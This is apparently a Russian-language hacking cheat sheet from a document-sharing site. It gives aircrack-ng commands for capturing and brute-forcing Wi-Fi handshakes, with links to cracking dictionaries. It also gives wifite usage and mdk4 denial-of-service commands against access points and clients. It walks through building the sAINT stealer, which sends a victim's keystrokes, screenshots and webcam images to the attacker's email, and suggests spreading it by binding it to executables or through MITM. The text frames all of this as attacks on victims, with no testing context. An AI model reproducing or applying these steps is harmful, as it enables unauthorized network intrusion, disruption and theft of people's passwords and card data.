Вы находитесь на странице: 1из 5

Взлом Wifi c помощью захвата Handshake

и эго подбор брутфорсом

Словари для брутфорса:


1. https://drive.google.com/file/d/0BzPEUV1S8i-KMUNIOGNmc1BzVEk/view -- даты
2. https://drive.google.com/file/d/0B5esKpQE9MVyc1NwTGJtR1hudWc/view -- 9млн.
слов
3. https://drive.google.com/file/d/0B5esKpQE9MVySTRINWJHNC0wblU/view – словарь
от InsadePro
4. http://gfile/a5aN -- номера телефонов Украины
Bssid---MacAdress
https://www.youtube.com/watch?v=P-coZnvM8g0&list=PLRIMhZPolTDUgQ8-cPps-
TXOsqcOvhHFD&index=4 -----ссылка на видео
Команды и их обяснения

 ifconfig -- узнаем сетевые адаптеры(wlan0 или wlan1 или eth0)


 airmon-ng check kill – убиваем все ненужные процесы
 airmon-ng start [сетевой адаптер] – запуск сетевого адаптера в режим захвата
всех пакетов
 airodump-ng [сетевой адаптер]mon – запуск сканирования сетей
 Выбираем точку и запоминаем СH и BSSID
 airodump-ng --bssid[вводим bssid] –channel [вводим CH] -w /путь к сохранению
handshake/ [сетевой адаптер]mon
 Смотрим кто подключен
 aireplay-ng --deauth 20 -a [bssid точки доступа] -с [bssid клиента] [сетевой
адаптер]mon ----отключаем клиента что-бы захватить handshake
 Теперь в папке сохранения handshake достаем файл .cap и делаем его копию
 wpaclean [/путь к новому очищеному handshake файлу/] [/путь к старому
handshake файлу/] ------очищаем handshake
 Сохраняем в текстовом редакторе bssid и имя точки доступа
 aircrack-ng -w [путь к словарю] -b [bssid] [путь к очищеному handshake]
WIFITE
Автоматизация ловли handshake и эго розшифровка, отключение клиента. Wifite
должна быть запущена от рута. Это требуется набором программ, который она
использует. Запуск загруженных скриптов от рута — это плохая идея. Я рекомендую
использовать загрузочный Kali Linux Live CD, загрузочную флешку USB (для
тестирования на проникновение) или виртуальную машину. Помните, что
виртуальные машины не могут напрямую иметь доступ к железу, поэтому требуется
беспроводной USB адаптер.

 git clone https://github.com/derv82/wifite2.git ——— скачивание новой


wifite(v2)
 cd wifite2/ ——— переходим в папку с програмой
 ./Wifite.py ——— запуск программы
 Остонавливаем сканирование (ctrl + c) и вводим номер нужной нам сети
 ./Wifite - -dict [’путь к словарю’] ——— Начнеться все заново
Стиллер (s)AINT
Это определённый класс троянов который следит за всеми движениями, нажатиями
на клавиатуре, картинкой с экрана и веб-камеры, , вводами паролей и банковских
карт и т.д. Для эго роботы на компютере или ноутбуке должен быть установлен java.
Стиллер (s)AINT после попадания на устройство копирует себя на жосткий диск и
добавляеться в автозагрузку и работает как KeyLogger.

 apt update ——— обновляем пакеты


 apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev
libncurses5-dev lib32z1 lib32ncurses5 -y ——— устанавливаем пакеты стиллера
 git clone https://github.com/tiagorlampert/sAINT.git ——— устанавливаем сам
стиллер (s)AINT
 cd sAINT ——— переходим в каталог с стиллером
 chmod +x configure.sh
 ./configure.sh ——— запуск стиллера
 java -jar sAINT.jar ——— сборка стиллера
 Нажимаем Enter, вводим почту gmail.com, включить ненадёжные приложения
разрешены, вводим пароль от почты которую ввели, использовать захват
скриншота[yes or no], захват веб-камеры[yes or no], enable persistence это
сохранять или нет на компютере стиллер, Сохранять все файлы стиллера на
компютере жертвы [yes or no], сколько символов нужно ввести жертве что-бы
на почту пришло сообщение с всеми данными, готово.

Розспостранение: вставить в другой ехе файл или подмена загружаемого файла с


помощью MITM атаки.
Mdk4 или Dos атака с помощью kali linux
Эта программа позволяет отправить фреймы, пакеты на сеть для её отключения.

 apt-get install pkg-config libnl-3-dev libnl-genl-3-dev libpcap-dev


 git clone https://github.com/aircrack-ng/mdk4
 cd mdk4
 make
 sudo make install
 iw dev -- -- -- запоминаем наш сетевой адаптер
 airmon-ng check kill -- -- -- уничтожаем ненужные программы
 airmon-ng start [сетевой адаптер] -- -- -- запуск адаптера в режим монитора
 mdk4 [сетевой адаптер]mon a -- -- -- dos атака на все точки доступа
 mdk4 [сетевой адаптер]mon b –m -- -- -- создает много точок доступа
 mdk4 [сетевой адаптер]mon b –ams 500 -- -- -- очень мощная dos атака на все
точки
 mdk4 [сетевой адаптер]mon d -- -- -- отключает клиентов от сети
 mdk4 [сетевой адаптер]mon f –sap –m bmstm –p 400 -- -- -- очень очень мощьная
атака
 airodump-ng [сетевой адаптер] -- -- -- находим нужную нам сеть и запоминаем,
копируем MacAdress(BSSID)
 mdk4 [сетевой адаптер]mon d [bssid] -- -- -- отключаем пользователей от нужной
нам точки
METASPLOIT: Framework
Инструмент для создания, тестирования и использования эксплойтов. Позволяет
конструировать эксплойты с необходимой в конкретном случае «полезной нагрузкой»
( payloads ), которая выполняется в случае удачной атаки, например, установка shell
или VNC сервера. Также фреймворк позволяет шифровать шеллкод, что может скрыть
факт атаки от IDS или IPS. Для проведения атаки необходима информация об
установленных на удаленном сервере сервисах и их версии, то есть нужно
дополнительное исследование с помощью таких инструментов, как nmap или nessus.
Установка Metasploit -- -- -- https://www.youtube.com/watch?v=iDx1ABToJBU

Вам также может понравиться